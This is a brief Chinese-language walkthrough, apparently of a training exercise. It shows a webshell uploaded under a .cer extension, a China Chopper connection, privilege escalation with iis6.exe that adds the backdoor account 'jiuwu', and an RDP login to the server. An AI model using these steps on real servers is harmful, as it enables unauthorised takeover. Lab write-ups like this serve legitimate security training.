通过第五题进入了后台找到产品管理可以修改上传文件
制作了一句话木马程序,把后缀名改为cer可以上传
之后用菜刀连接,但是没有权限访问C盘
通过E:5\admin\Databackup\打开CMD
输入命令whoima,拒绝访问
输入命令iis6.exe "net user jiuwu 1234 /add"
net user发现成功添加用户
mstsc /admin命令,远程连接桌面120.203.13.75
使用用户名jiuwu,密码1234 就可以登陆到网站服务器
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.